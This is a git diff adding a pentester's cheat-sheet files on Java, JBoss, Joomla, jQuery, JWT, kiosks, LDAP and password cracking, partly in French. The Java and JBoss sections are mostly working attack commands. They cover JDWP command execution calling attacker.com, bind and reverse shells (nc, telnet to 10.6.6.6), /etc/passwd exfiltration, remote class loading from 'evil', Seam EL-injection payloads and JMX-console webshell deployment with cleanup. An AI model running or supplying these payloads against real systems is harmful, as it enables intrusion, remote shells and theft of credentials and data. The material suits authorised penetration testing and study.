+ip tunnel add he-ipv6 mode sit remote 216.66.84.46 local my.public.ip.v4 ttl 255
+ip link set he-ipv6 up
+ip addr add 2001:470:1f14:10a9::2/64 dev he-ipv6
+ip route add ::/0 dev he-ipv6
+ip -f inet6 addr
+
+# http proxy to ipv6
+http://maroueneboubakri.blogspot.com.au/2014/02/olympic-ctf-sochi-2014-curling100.html
diff --git a/Cheat Sheet/java b/Cheat Sheet/java
new file mode 100644
index 0000000..5337c81
--- /dev/null
+++ b/Cheat Sheet/java	
@@ -0,0 +1,285 @@
+# java
+
+# decompiler / editor / debugger
+http://www.javadecompilers.com/
+https://github.com/Storyyeller/Krakatau
+https://github.com/Konloch/bytecode-viewer.git
+http://jode.sourceforge.net/
+
+# coverity source code java audit
+https://code-spotter.com/
+
+# JDK_HOME JAVA_HOME
+/usr/lib/jvm/oracle-jdk-1.7.0_13
+
+# download old versions from archive
+http://www.oracle.com/technetwork/java/javase/archive-139210.html
+
+# java class file version
+major  minor Java platform version 
+45       3           1.0
+45       3           1.1
+46       0           1.2
+47       0           1.3
+48       0           1.4
+49       0           1.5
+50       0           1.6
+
+# hibernate
+http://blog.h3xstream.com/2014/02/hql-for-pentesters.html
+http://0ang3el.blogspot.com.au/2015/12/zeronights-0x05.html
+http://static.sstic.org/rumps2015/SSTIC_2015-06-04_P12_RUMPS_09_Factorisation.{mp4,pdf}
+\'' (MySQL)
+' -- ' (https://twitter.com/_unread_/status/609311174170181632)
+$$'' (Oracle/H2 https://twitter.com/Agarri_FR/status/609523917875752960)
+
+* getTemplate().find("FROM ..." + url_param1)
+vuln but you can't make subqueries
+
+* getSession().createSQLQuery("select * from blah where id = " + url_param1) or createQuery (to confirm)
+vuln and you can make subqueries
+
+# system properties
+System.getProperties().list(System.out);
+
+# jdwp
+http://seclists.org/nmap-dev/2010/q1/867
+https://github.com/schierlm/JavaPayload/ (http://schierlm.users.sourceforge.net/JavaPayload/)
+https://gist.github.com/hugsy/7868799
+http://www.hsc-news.com/archives/2013/000109.html LSV
+https://github.com/rapid7/metasploit-framework/pull/3407 msf/java_jdwp_debugger
+
+java -Xrunjdwp:server=y,transport=dt_socket,address=4000,suspend=n -cp . HelloWorld
+or
+java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=1234 -cp . HelloWorld
+
+port is random if address= not specified
+
+jdwp-shellifier massscan ports: 8000,8787,8788,9009,7777,8453,5005,3999,5000,18000,9001
+
+Developer | Product                       Default TCP port  Version
+----------+--------------------------------------------------------
+Apache    | Tomcat                        *:8000            7.0.52
+Apache    | Tomcat                        localhost:8000    8.0.3
+Red Hat   | JBoss EAP                     *:8787            6.2.0
+Red Hat   | JBoss AS                      *:8787            7.1.1
+Red Hat   | JBoss WildFly                 *:8787,*:8788     8.0.0
+Oracle    | GlassFish                     *:9009            4.0
+IBM       | WebSphere Application Server  *:7777            8.5.5
+Oracle    | Oracle WebLogic Server        *:8453            12c
+          | Filemaker                     *:3999            <v12
+
+* jdb -attach <ip:port>
+ce qui marche vraiment 
+threads
+thread 0x1
+where
+thread 0x2
+where
+pick a function that is not called by too many threads and place a breakpoint on it with "stop in"
+
+jdb -attach 192.168.111.208:7000
+> help
+> version
+> classpath
+> trace go methods
+> untrace
+
+> threads
+> thread 0x1
+> suspend 0x1
+> where
+> class|methods|fields javaapplication6.JavaApplication6
+> resume
+
+> stop in javaapplication6.JavaApplication6.main
+Breakpoint hit: "thread=main", javaapplication6.JavaApplication6.main(), line=19 bci=0
+
+main[1] print new java.lang.String("Blah").length()
+ new java.lang.String("Blah").length() = 4
+
+main[1] print java.lang.System.getProperty("user.name")
+ java.lang.System.getProperty("user.name") = "Administrator"
+
+print new java.lang.Runtime().exec("dig hello.d2t.attacker.com")
+print new java.lang.Runtime().exec("curl http://attacker.com/hello")
+
+- ProcessBuilder may not be listed in classes, but try use it anyway
+- ProcessBuilder may not be available if not loaded by the JVM, I would get error "No class named: java.lang.ProcessBuilder" (ie. nobody does import java.lang.ProcessBuilder).
+- java.util.Arrays.asList might not be avail depending on java version, use "".split("_") instead
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "dig yes.d2t.attacker.com")).start() OK
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "dig $USER.asdf.d2t.attacker.com")).start() OK fmserver
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "dig uid$UID.asdf.d2t.attacker.com")).start() OK 502
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "nc -vlnp 3999 < /tmp/.f|/bin/sh > /tmp/.f 2>&1")).start()
+
+- inband
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","cat /etc/passwd|tr \\n @")).start().getInputStream(),"UTF-8"),1000000).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","cat /etc/passwd|gzip -f|base64 -w0")).start().getInputStream())).readLine()
+openssl base64
+
+- bind shell
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","mkfifo /tmp/.f")).start().getInputStream())).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(java.util.Arrays.asList("bash","-c","nc -l 4000 < /tmp/.f|sh > /tmp/.f 2>&1")).start().getInputStream())).readLine()
+
+- reverse shell
+print new java.lang.Runtime().exec("/usr/sfw/bin/wget -O /home/wasusr/.t.sh http://10.6.6.6:8080/demo/.t.sh")
+print new java.lang.ProcessBuilder(java.util.Arrays.asList("/bin/sh", "-c", "telnet 10.6.6.6 8888 | /bin/sh | telnet 10.6.6.6 9999")).start()
+
+- Runtime instead of ProcessBuilder 
+print new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())).skip(32).readLine()
+print new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("bashXX-cXXuname -a 2>&1".split("XX")).getInputStream())).readLine()
+
+print new java.lang.Runtime().exec("bash -c id>/tmp/id.txt")
+print new java.lang.Runtime.getRuntime().exec("bash_-c_uname -a>/tmp/uname.txt".split("_"))
+print new java.io.BufferedReader(new java.io.FileReader("/tmp/uname.txt")).readLine()
+
+print new java.io.FileWriter("/tmp/b.txt").append("asdf asdfasdfasdf asdf@asdf").flush()
+
+# dymanic code execution using class loader
+http://www.hsc-news.com/archives/2010/000074.html LSV
+
+  try{
+    /* Construction des URL où chercher */
+    URL[] classUrls = {
+      new URL("http://evil/remote.jar")
+    };
+
+    /* Instanciation du classloader avec les URL */
+    URLClassLoader urlLoader = new URLClassLoader(classUrls);
+
+    /* Chargement et instanciation de la classe malveillante */
+    Class cls = urlLoader.loadClass("hsc.Remote");
+    Object malicious = cls.newInstance();
+
+    /* Invocation de la méthode malveillante */
+    Method maliciousMethod = cls.getMethod("print");
+    System.out.println(maliciousMethod.invoke(malicious));
+  } catch(Exception e) {
+    e.printStackTrace();
+  }
+
+Le code malveillant n'est plus présent ni dans l'application ni dans une
+bibliothèque du classpath et réalise pourtant des opérations potentiellement
+malveillantes : 
+
+  package hsc;
+  
+  import java.io.*;
+  
+  public class Remote {
+    public String print() {
+      Process proc;
+      BufferedReader output;
+      StringBuilder result = new StringBuilder();
+      String[] cmdArray = {"/bin/bash", "-c", "id"};
+  
+      try {
+        proc = Runtime.getRuntime().exec(cmdArray);
+        output = new BufferedReader(
+          new InputStreamReader(proc.getInputStream())
+        );
+    
+        char buffer[] = new char[8192];
+        int lenRead;
+    
+        while ((lenRead = output.read(buffer, 0, buffer.length)) > 0) {
+          for (int i = 0; i < lenRead; i++) {
+            result.append(buffer[i]);
+          }
+        }   
+      } catch (Exception e) {
+        e.printStackTrace();
+      }   
+      
+      return result.toString(); 
+  
+    }
+  }
+
+# jsf - Java Server Faces
+* decode viewstate
+https://github.com/SpiderLabs/deface.git (https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-001/?fid=3765)
+
+* oracle padding decryption
+POET
+Inyourface
+
+# jboss seam / jsf
+* expression language injection via remote inclusion
+<body>
+<p>${"".getClass().forName('java.lang.Runtime').getDeclaredMethods()[14].invoke("".getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), param.test)}</p>
+</body>
+http://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html used by the JSF framework
+
+* EL injection via actionOutcome (CVE-2010-1871)
+http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html https://bugzilla.redhat.com/show_bug.cgi?id=615956 http://www.cvedetails.com/cve/CVE-2010-1871/
+
+test: GET /vuln/home.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23{expressions.getClass().forName('java.lang.Runtime')}
+vuln: Location: /vuln/pwn.seam?pwned=class+java.lang.Runtime
+fix: developers blacklisted # and { characters in actionOutcome, but can be bypassed via actionMethod + double EL injection
+
+* actionMethod + double EL injection
+someone hinted it would be possible back in 2010 http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html?showComment=1285586160417#c3222807404834356400
+the bypass 0day was exploited during hitcon-ctf-quals-2016 Angry Seam
+
+update user description to: /?a=#{expressions.instance().createValueExpression(request.getQueryString()).getValue()}
+then access /angryseam/template.seam?x=#{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('Cmd'))}&actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) + send header Cmd: ping blah
+
+1st condition: need a page that will eval actionMethod=
+2nd condition: need another page to store our first EL
+
+https://github.com/seam2/jboss-seam/blob/f3077fee9d04b2b3545628cd9e6b58c859feb988/jboss-seam/src/main/java/org/jboss/seam/navigation/Pages.java#L674
+line 708 is the first evaluation and line 710 will evaluate again
+
+forever vuln because not maintained anymore: https://github.com/seam2/jboss-seam/commit/965d4f3ea4dd527a41402f4758878de02d5ede7d
+
+* CVE-2013-2165 java deserialization in Richfaces 3.3.3Final // http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/
+vuln: in richfaces-impl-3.3.3.Final.jar:org.ajax4jsf.resource.ResourceBuilderImpl.class
+test: GET /jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js (jpa is an example app in Jboss seam 2.2.1Final
+exploit: http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxx
+Tomcat (or JBoss) detects prefix /a4j and routes request to Richfaces
+Richfaces uses ResourceBuilderImple to parse g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxx
+skips g/3.3.3.Final and grabs resource path org/richfaces/renderkit/html/scripts/skinning.js as well as descompress+deserialize the xxxxxxxxx after DATA/
+use ysoserial and compress+base64 encode to generate xxxxxxxxx
+
+# JSP Expression Language
+JSP EL is a specification, there are many implementations (e.g. OGNL in struts2/webwork, Spring SpEL, JBoss EL, MVEL)
+only since the JSP 2.0 specification has EL been available within JSP pages directly
+however, it can and has been used in non-view use cases
+https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf
+http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
+can be turned off since Spring 3.0.6 and above by setting the springJspExpressionSupport context parameter to false in web.xml
+turned off by default since Spring Framework 3.1 onwards when running on Servlet 3.0 or higher
+
+# jnlp
+download jar files from a jnlp file: https://code.google.com/p/jnlpdownloader/
+
+# rmi
+http://www.accuvant.com/blog/exploiting-jmx-rmi
+https://github.com/mogwaisec/mjet
+https://labs.portcullis.co.uk/tools/rmiinfo/
+also see msf and nmap exploits
+
+# jd-gui
+find -type f -print0 | xargs -0 sed -i -e 's,^[[:space:]]*/\*[^*]\+\*/ ,,'
+
+# java all the vulns
+https://bitbucket.org/ilmila/j2eescan/
+
+# deserialization
+http://blog.cr0.org/2009/05/write-once-own-everyone.html
+http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-serialization/
+https://github.com/federicodotta/Java-Deserialization-Scanner (scanner for burp)
+https://github.com/njfox/Java-Deserialization-Exploit
+https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet (reference *)
+
+# jrun
+rce if http://1.2.3.4/a;.jsp or /a%253bjsp gives a 404 error by Jrun instead of Apache
+
+# jsp
+http://www.owasp.org/index.php?title=Category:OWASP_JSP_Testing_Tool_Project
+
+# groovy
+java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("hehe").getText()
diff --git a/Cheat Sheet/javascript b/Cheat Sheet/javascript
new file mode 100644
index 0000000..e124811
--- /dev/null
+++ b/Cheat Sheet/javascript	
@@ -0,0 +1,8 @@
+# javascript
+
+# extract urls
+https://github.com/nahamsec/JSParser
+
+# deobfucate
+http://jsnice.org/
+http://jsbeautifier.org/
diff --git a/Cheat Sheet/jboss b/Cheat Sheet/jboss
new file mode 100644
index 0000000..9599f46
--- /dev/null
+++ b/Cheat Sheet/jboss	
@@ -0,0 +1,118 @@
+# jboss
+
+# quick links
+http://synacktiv.com/ressources/Intrusion_JBoss_AS_MISC.pdf
+http://www.hsc-news.com/archives/2013/000102.html
+http://lab.mediaservice.net/notes_more.php?id=JBOSS_more
+http://www.hsc.fr/ressources/presentations/sstic10_jboss/sstic10_jboss_article.pdf
+http://www.redteam-pentesting.de/publications/jboss
+http://www.openwall.com/lists/oss-security/2014/03/31/1
+
+# bon resume des CVE
+http://seclists.org/oss-sec/2014/q1/702
+
+# info gath
+jboss.system:type=ServerConfig
+
+# RCE CVE-2010-1871
+jboss admin console vuln to auth bypass because based on the seam/jsf framework (Jboss 5.1 to 6.1.0 Final concerned)
+see ./java
+
+# RMI calls w/ twiddle
+./bin/twiddle.sh -o localhost get "jboss.system:type=ServerInfo"
+./jimmix.sh -i http://jboss/invoker/JMXInvokerServlet get "jboss.system:type=ServerInfo" OSVersion
+
+# jboss6 and jmxinvokerservlet
+./bin/twiddle.sh -o localhost invoke "jboss.web:type=Manager,host=localhost" listSessionIds # No MBean matches for query: jboss.web:type=Manager,host=localhost
+./bin/twiddle.sh -o localhost invoke "jboss:name=SystemProperties,type=Service" showAll # no security manager: RMI class loader disabled 
+./bin/twiddle.sh -o localhost invoke "jboss.admin:service=DeploymentFileRepository" store xxxyyy.war xxxyyy .jsp ThisIsATest True # from blog but "No MBean matches for query: jboss.admin:service=DeploymentFileRepository"
+./bin/twiddle.sh -o localhost invoke "jboss.system:service=MainDeployer" deploy http://127.0.0.1/appli.war
+
+# BSH if outbound conns denied
+./bin/twiddle.sh -o localhost invoke "jboss.deployer:service=BSHDeployer" createScriptDeployment "`cat redteam.bash`" redteam.bsh # to test
+./bin/twiddle.sh -o localhost invoke "jboss.system:service=MainDeployer" deploy file:/tmp/redteam.war
+
+# read jboss/server/default/conf/props/jmx-console-users.properties
+* jimmix
+./jimmix.sh -P 127.0.0.1:8082 -i http://x.x.x.x/invoker/JMXInvokerServlet invoke jboss:name=SystemProperties,type=Service load file:///d:/apps/jboss-4.2.3.GA/server/default/conf/props/jmx-console-users.properties
+./jimmix.sh -P 127.0.0.1:8082 -i http://x.x.x.x/invoker/JMXInvokerServlet invoke jboss:name=SystemProperties,type=Service showAll (stacktrace but see response in proxy)
+* redteam tools
+use burp or socat to redirect to https
+./webconsole_invoker.rb -u http://127.0.0.1:8008/web-console/Invoker -i load -s "java.lang.String" -p file:///opt/jboss/jboss-4.2.3.GA/server/default/conf/props/jmx-console-users.properties jboss:name=SystemProperties,type=Service
+./webconsole_invoker.rb -u http://127.0.0.1:8008/web-console/Invoker -i showAll jboss:name=SystemProperties,type=Service
+
+# lister les jsessionid
+mbeanServer.invoke(new ObjectName("jboss.web:type=Manager,host=localhost"), "listSessionIds", null, null) // see hsc-news
+
+# scanner des jmx-console
+http://FILE0:8080/jmx-console/style_master.css
+
+# info gathering
+clusterd
+msf auxiliary/scanner/http/jboss_vulnscan
+nmap http-vuln-cve2010-0738.nse
+/web-console/ServerInfo.jsp
+
+/status
+/jmx-console/HtmlAdaptor
+/web-console/Invoker
+/invoker/JMXInvokerServlet
+
+verb tampering
+
+# webshell via jmx-console
+* MainDeployer
+http://127.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%253Aservice%253DMainDeployer&methodIndex=17&arg0=http%3A%2F%2F6.6.6.6%2Fpub%2FWSTest.war
+
+* DeploymentFileRepository MBean
+curl -v http://127.0.0.1:8080/jmx-console/HtmlAdaptor -d 'action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=wstestdepl.war&argType=java.lang.String&arg1=wstestdepl&argType=java.lang.String&arg2=.jsp&argType=java.lang.String' --data-urlencode arg3@code/NetBeansProjects/WSTest.war.jsp -d 'argType=boolean&arg4=True'
+curl -v http://127.0.0.1:8080/wstestdepl/wstestdepl.jsp
+curl -v http://127.0.0.1:8080/wstest/
+
+* webshell le plus simple possible mais on verra pas le resultat des commandes (exemple du paper 2010 redteam)
+curl -X HEAD -v 'http://127.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25Runtime.getRuntime%28%29.exec%28request.getParameter%28%22c%22%29%29%3B%25%3E%0A&argType=boolean&arg4=True'
+curl -v 'http://127.0.0.1:8080/shell/shell.jsp?c=touch%20%2ftmp%2fowned.txt'
+
+cleanup:
+/wstest/ETest -d 'c=rmdir+f:\jboss-4.2.3.GA\server\default\deploy\management\wstestdepl.war+/S+/Q'
+/wstest/ETest -d 'c=rmdir+f:\jboss-4.2.3.GA\server\default\work\jboss.web\localhost\wstestdepl+/S+/Q'
+/wstest/ETest -d 'c=rmdir+f:\jboss-4.2.3.GA\server\default\work\jboss.web\localhost\wstest+/S+/Q'
+/wstest/ETest -d 'c=del+f:\jboss-4.2.3.GA\server\default\deploy\management\wstest.war'
+
+# deployer webshell via JMXInvokerServlet a la mano
+http://breenmachine.blogspot.com.au/2013/09/jboss-jmxinvokerservlet-exploit.html
+http://breenmachine.blogspot.com.au/2014/02/jboss-jbxinvoker-servlet-update.html
+
+# securiser jmx & web consoles
+https://community.jboss.org/wiki/SecureTheJmxConsole
+https://community.jboss.org/wiki/SecureJBoss 
+worm: https://community.jboss.org/blogs/mjc/2011/10/20/statement-regarding-security-threat-to-jboss-application-server
+sec-script-0.1.zip
+
+# audit
+liste des fichiers à récupérer d'après CVS/guides/Jboss/audit_jboss.txt
+
+# JMX Console
+/opt/jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml
+/opt/jboss/server/default/conf/props/jmx-console-users.properties
+
+# Web Console
+/opt/jboss/server/default/deploy/management/console-mgr.sar/web-console.war/WEB-INF/web.xml 
+/opt/jboss/server/default/conf/login-config.xml 
+
+/opt/jboss/server/default/conf/props/jmx-console-users.properties 
+/opt/jboss/server/default/conf/props/jmx-console-roles.properties 
+
+/opt/jboss/server/default/conf/props/web-console-users.properties
+/opt/jboss/server/default/conf/props/web-console-roles.properties
+
+/opt/jboss/server/default/conf/jboss-service.xml
+
+# recuperer tous les fichiers login-config.xml
+/opt/jboss/server/default/conf/login-config.xml
+
+# tout recuperer
+find -type f ! \( -name '*.jar' -o -name '*.war' \) -print0 -o -type d -print0 | xargs -0 tar cf /path/to/jboss.tar
+
+# JBoss6 & JMXInvokerServlet
+http://docs.jboss.org/jbosssecurity/docs/6.0/security_guide/html/chap-Consoles_and_Invokers.html
diff --git a/Cheat Sheet/jenkins b/Cheat Sheet/jenkins
new file mode 100644
index 0000000..98aa94e
--- /dev/null
+++ b/Cheat Sheet/jenkins	
@@ -0,0 +1,7 @@
+# jenkins
+
+* rce - service allows to run Groovy script through the Jenkins Script Console
+http://blog.dewhurstsecurity.com/2014/12/09/how-i-hacked-facebook.html
+
+* rce - deserialization
+https://blogs.securiteam.com/index.php/archives/3171
diff --git a/Cheat Sheet/john b/Cheat Sheet/john
new file mode 100644
index 0000000..45ce2c2
--- /dev/null
+++ b/Cheat Sheet/john	
@@ -0,0 +1,34 @@
+# john the ripper
+
+# format
+http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
+
+# incremental avec un charset [a-z0-9]{6,8}
+-- creer un john.pot avec une seule ligne:
+*6C03989037359284236EED9F551513C28869CAD5:abcdefghijklmnopqrstuvwxyz0123456789
+$ echo -n abcdefghijklmnopqrstuvwxyz0123456789 | openssl dgst -sha1 -binary | openssl dgst -sha1 | tr '[a-z]' '[A-Z]'
+6C03989037359284236EED9F551513C28869CAD5
+-- creer le fichier alnum_az09.chr
+$ john --make-charset=alnum_lower.chr
+-- creer une nouvelle section dans john.conf
+[Incremental:alnum_lower]
+File = $JOHN/alnum_lower.chr
+MinLen = 6
+MaxLen = 8
+CharCount = 36
+-- lancer john en incremental
+john -i=alnum_lower path/to/pw_file
+
+# casser du LM/NT et decouvrir la vraie casse ("true case") des mots de passe
+-- isoler les empreintes LM et NT qu'il reste à casser
+john -format:lm -show=left dc01_fgdump.pw > dc01_lm.pw
+john -format:nt -show=left dc01_fgdump.pw > dc01_nt.pw
+-- casser les empreintes avec john et rcrack
+-- creer le dico des mots de passe trouvés pour LM
+john -show dc01_lm.pw | grep ':' | cut -d: -f2- | sort -u > fgdump_lm.dic
+john -show=left -format:nt dc01_fgdump.pw > dc01_nt.pw
+-- trouver la vraie casse
+john -format:nt -rules:nt -w:fgdump_lm.dic dc01_nt.pw
+
+# vBulletin
+john -field-separator-char=';'
diff --git a/Cheat Sheet/joomla b/Cheat Sheet/joomla
new file mode 100644
index 0000000..8ca3e5b
--- /dev/null
+++ b/Cheat Sheet/joomla	
@@ -0,0 +1,38 @@
+# joomla
+
+# sqli
+https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0
+there are other sqlis in recent versions stfw
+
+# check vulnerable plugins/extensions
+http://vel.joomla.org/
+https://docs.joomla.org/Joomla_3.1_version_history
+
+# joomla = 1.5.12
+http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities
+
+# joomla <= 1.5.12
+http://www.securityfocus.com/archive/1/505231
+
+# joomla < 3.6.4 admin-level account creation bypass
+https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2
+
+## extensions
+# RSForm!Pro
+https://www.rsjoomla.com/joomla-extensions/joomla-form.html
+https://www.rsjoomla.com/support/documentation/view-knowledgebase/125-changelog.html
+https://www.rsjoomla.com/forum/37-rsform-pro.html
+https://www.rsjoomla.com/blog/view/229-we-have-changed-the-way-we-keep-track-of-new-versions.html (Rev20==1.2.0, Rev30==1.3.0, Rev40==1.4.0, Rev49==1.49.0 and no more RevXX 1.49.1, 1.49.2 ...)
+
+# Pretty Photo, slprettyphoto (Starlite)
+* xss CVE-2013-6837 prettyPhoto 3.1.4 and earlier
+search for rel="pretty
+then exploit with adding: #prettyPhoto[ADAPTME]/2,<a onclick="alert(1);">/
+https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc # but there's a typo lol
+
+version 3.1.5 downloadable at http://www.no-margin-for-errors.com/projects/prettyPhoto-jquery-lightbox-clone/ fixes the vuln and is typo-free (according to http://www.saotn.org/prettyphoto-dom-based-xss/)
+source is at: https://github.com/scaron/prettyphoto (ref to no-margin-for-errors.com in README.md)
+
+# remember me cookies contain username + password XOR'ed with $secret from configuration.php
+http://seclists.org/fulldisclosure/2013/Jun/149
+however on 3.1.0 there is no option to submit remember=1 in POST
diff --git a/Cheat Sheet/jquery b/Cheat Sheet/jquery
new file mode 100644
index 0000000..d4cada9
--- /dev/null
+++ b/Cheat Sheet/jquery	
@@ -0,0 +1,12 @@
+# jquery
+
+* CVE-2011-4969 xss in jQuery before 1.6.3
+https://bugs.jquery.com/ticket/9521
+PoC http://vuln/#<img src=/ onerror=alert(1)> https://github.com/ctfs/write-ups-2014/tree/master/csaw-ctf-2014/hashes
+
+http://www.securityweek.com/developers-fix-xss-vulnerability-jquery-validation-plugin-script
+jquery-validation/demo/captcha/index.php 
+- <div id="captchaimage"><a href="http://github.com/%3C?php%20echo%20$_SERVER['PHP_SELF']; ?>" id="refreshimg
++ <div id="captchaimage"><a href="http://github.com/%3C?php%20echo%20htmlEntities($_SERVER['PHP_SELF'], ENT_QUOTES); ?>" id
+
+old jquery dom xss: if jQuery is used to evaluate location.hash, that would allow an attacker to inject script into the page. This flaw has been patched in jQuery 1.6.3 and beyond. 
diff --git a/Cheat Sheet/jwt b/Cheat Sheet/jwt
new file mode 100644
index 0000000..6d2b804
--- /dev/null
+++ b/Cheat Sheet/jwt	
@@ -0,0 +1,14 @@
+# jwt (json web token)
+
+https://jwt.io/
+
+# implementations not verifying the signature when alg = none
+https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
+
+# JSON Web Encryption (JWE) with Key Agreement with Elliptic Curve Diffie-Hellman Ephemeral Static (ECDH-ES)
+attacker can recover private key
+vuln: go-jose, node-jose, jose2go, Nimbus JOSE+JWT, jose4
+
+# automate tests
+https://github.com/ticarpi/jwt_tool
+https://github.com/andresriancho/jwt-fuzzer
diff --git a/Cheat Sheet/keepass b/Cheat Sheet/keepass
new file mode 100644
index 0000000..86500c3
--- /dev/null
+++ b/Cheat Sheet/keepass	
@@ -0,0 +1,4 @@
+# keepass
+
+# extract passwords from memory
+https://github.com/denandz/KeeFarce
diff --git a/Cheat Sheet/keylogger b/Cheat Sheet/keylogger
new file mode 100644
index 0000000..809d391
--- /dev/null
+++ b/Cheat Sheet/keylogger	
@@ -0,0 +1,9 @@
+# keylogger
+
+# couvre tout du hardware, aux kl en kern/user mode 
+https://securelist.com/analysis/publications/36358/keyloggers-implementing-keyloggers-in-windows-part-two/
+
+https://github.com/guitarman0831/Onyx
+https://sourceware.org/systemtap/
+https://python-evdev.readthedocs.org/en/latest/
+https://govolution.wordpress.com/2015/07/14/a-basic-keylogger-for-windows/
diff --git a/Cheat Sheet/keytool b/Cheat Sheet/keytool
new file mode 100644
index 0000000..7996eb5
--- /dev/null
+++ b/Cheat Sheet/keytool	
@@ -0,0 +1,12 @@
+# keytool
+
+# generer un certificat auto-signé
+java sun.security.tools.KeyTool -genkeypair -keystore tomcat.jks -alias tomcat
+
+# afficher le contenu du keystore
+java sun.security.tools.KeyTool -list -v -keystore tomcat.jks -storepass password
+
+# creer un truststore et importer un certifcate racine
+java sun.security.tools.KeyTool -keystore /path/to/trust.jks -importcert -file cacert.pem
+System.setProperty("javax.net.ssl.trustStore","/path/to/trust.jks");
+System.setProperty("javax.net.ssl.trustStorePassword","changeit");
diff --git a/Cheat Sheet/kiosk b/Cheat Sheet/kiosk
new file mode 100644
index 0000000..ec444c2
--- /dev/null
+++ b/Cheat Sheet/kiosk	
@@ -0,0 +1,13 @@
+# kiosk
+
+ikat (http://ikat.ha.cked.net/)
+http://www.anotherwayin.net/2015/07/windows-7-error-recovery-authentication.html
+
+# logoff & login as administrator
+if administrator account is not disable, just logoff holding the Shift key,
+then the logon screen will show the other accounts.
+
+# create below .html file and open it with IE to launch cmd.exe
+<html>
+<iframe src="/service/file:///c:/windows/system32/cmd.exe" ></iframe>
+</html>
diff --git a/Cheat Sheet/kitrap0d b/Cheat Sheet/kitrap0d
new file mode 100644
index 0000000..0f0af51
--- /dev/null
+++ b/Cheat Sheet/kitrap0d	
@@ -0,0 +1,7 @@
+# kitrap0d
+
+http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
+http://www.cvedetails.com/cve/CVE-2010-0232/
+http://technet.microsoft.com/en-us/security/bulletin/MS10-015
+http://support.microsoft.com/kb/977165
+http://www.microsoft.com/en-au/download/details.aspx?id=9341
diff --git a/Cheat Sheet/ldap b/Cheat Sheet/ldap
new file mode 100644
index 0000000..48a1ff7
--- /dev/null
+++ b/Cheat Sheet/ldap	
@@ -0,0 +1,20 @@
+# ldap
+
+ldapsearch -h host -p 389
+ldapsearch -h host -p 389 -s sub -b '' -x -D '' -v   # auth anonyme
+ldapsearch -h host -p 389 -s sub -b 'o=blah,ou=blah' -D 'cn=Directory Manager' -w password
+ldapsearch -h host -p 389 -s sub -b 'o=blah,ou=blah" "(objectclass=*)"
+
+socat -d tcp-l:6636,fork,reuseaddr openssl:192.168.1.100:636,verify=0
+ldapsearch -h 127.0.0.1 -p 6636  ...
+
+ldapsearch -h 192.168.122.55 -x -D 'SECURUS\Administrator' -w Password1 -b "" -s base 'objectclass=*' # limits the scope of the search to the base DN to get the Root DSE
+ldapsearch -H ldap://192.168.122.55 -x -D 'SECURUS\Administrator' -w Password1 -b 'dc=securus,dc=corp,dc=com' # active directory
+
+# windows
+ldifde -a "cn=Directory Manager" s3cr3t -s 172.10.10.11 -f d:\\path\\export.ldif -d ou=demo,ou=blah,dc=thecompany,dc=com
+ldifde -a cn=Administrateur,cn=users,dc=dc1,dc=myowndomain,dc=local Password1 -s 192.168.111.189 -f export.ldif
+
